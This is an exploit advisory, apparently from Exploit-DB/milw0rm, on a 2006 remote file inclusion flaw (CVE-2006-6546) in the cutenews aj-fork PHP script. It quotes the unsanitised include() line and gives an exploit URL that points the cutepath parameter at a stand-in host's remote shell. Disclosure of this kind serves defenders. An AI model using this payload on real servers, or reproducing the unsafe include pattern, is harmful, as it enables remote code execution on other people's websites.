cutenews aj-fork <= 167f cutepath Remote File Include Vulnerability

2006-12-04T00:00:00
ID EDB-ID:2891
Type exploitdb
Reporter DeltahackingTEAM
Modified 2006-12-04T00:00:00

Description

cutenews aj-fork <= 167f (cutepath) Remote File Include Vulnerability. CVE-2006-6546. Webapps exploit for php platform

                                        
                                            ===========================================================================================================
DeltasecurityTEAM
www.Deltasecurity.ir
===========================================================================================================
* Portal Name : cutenews aj-fork

* Class = Remote File Inclusion ;
 
* Download =http://mesh.dl.sourceforge.net/sourceforge/ajfork/cn_aj_167.zip

* Found by = DeltahackingTEAM

* User In Delta Team (Tanha )

----------------------------------------------------------------------------------------------------------
- Vulnerable Code
--------------------

    include($cutepath.'/inc/plugins.php');

++++++++++++++++++++++++++++++++++++++++++++

- Exploit:
    http://[target]/[Path]/inc/shows.inc.php?cutepath=http://evilsite.com/shell?

----------------------------------------------------------------------------------------------------------
Sp Tnx For All Admin And All Member EXCEPT DR.TROJAN
Sp Tnx For Dr.Pantagon For Learning Find Bug

# milw0rm.com [2006-12-04]